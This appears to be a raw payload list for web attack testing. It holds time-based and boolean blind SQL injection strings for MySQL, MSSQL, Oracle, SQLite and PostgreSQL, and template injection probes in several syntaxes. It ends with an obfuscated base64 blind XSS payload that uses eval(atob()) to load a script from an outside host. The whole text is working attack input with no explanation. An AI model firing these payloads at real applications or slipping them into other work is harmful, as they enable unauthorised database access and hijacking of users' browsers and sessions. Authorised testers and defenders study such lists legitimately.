#MYSQL
1 + sleep(10)  --
1' + sleep(10) --
1" + sleep(10) --
1` + sleep(10) --
1') + sleep(10) --
1") + sleep(10) --
1`) + sleep(10) --
1')) + sleep(10) --
1")) + sleep(10) --
1`)) + sleep(10) --
1 and sleep(10) --
1' and sleep(10) --
1" and sleep(10) --
1` and sleep(10) --
1') and sleep(10) --
1") and sleep(10) --
1`) and sleep(10) --
1')) and sleep(10) --
1")) and sleep(10) --
1`)) and sleep(10) --
1 + 1=0 --
1' + 1=0 --
1" + 1=0 --
1` + 1=0 --
1') + 1=0 --
1") + 1=0 --
1`) + 1=0 --
1')) + 1=0 --
1")) + 1=0 --
1`)) + 1=0 --
1 AND 1=0 --
1' AND 1=0 --
1" AND 1=0 --
1` AND 1=0 --
1') AND 1=0 --
1") AND 1=0 --
1`) AND 1=0 --
1')) AND 1=0 --
1")) AND 1=0 --
1`)) AND 1=0 --
#MSQL
1 AND WAITFOR DELAY '0:0:10' --
1' WAITFOR DELAY '0:0:10' --
1" WAITFOR DELAY '0:0:10' --
1` WAITFOR DELAY '0:0:10' --
1') WAITFOR DELAY '0:0:10' --
1") WAITFOR DELAY '0:0:10' --
1`) WAITFOR DELAY '0:0:10' --
1')) WAITFOR DELAY '0:0:10' --
1")) WAITFOR DELAY '0:0:10' --
1`)) WAITFOR DELAY '0:0:10' --
#ORACLE
1 AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1" AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1` AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1') AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1") AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1`) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1')) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1")) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1`)) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) --
1 AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1 AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1" AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1` AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1') AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1") AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1`) AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1')) AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1")) AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1`)) AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) --
1#SQLite --
1 AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1" AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1` AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1') AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1") AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1`) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1')) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1")) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --
1`)) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) --

1 AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1" AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1` AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1') AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1") AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1`) AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1')) AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1")) AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
1`))  AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) --+
#PostgreSQL
1 || pg_sleep(10) --
1' || pg_sleep(10) --
1" || pg_sleep(10) --
1` || pg_sleep(10) --
1') || pg_sleep(10) --
1") || pg_sleep(10) --
1`) || pg_sleep(10) --
1')) || pg_sleep(10) --
1")) || pg_sleep(10) --
1`)) || pg_sleep(10) --
#Generic
{{77777*77777}}
${77777*77777}
<%= 77777*77777 %>
${{77777*77777}}
#{77777*77777}
${77777*77777}
${{77777*77777}}
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdmVyYXouYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61 onerror=eval(atob(this.id))>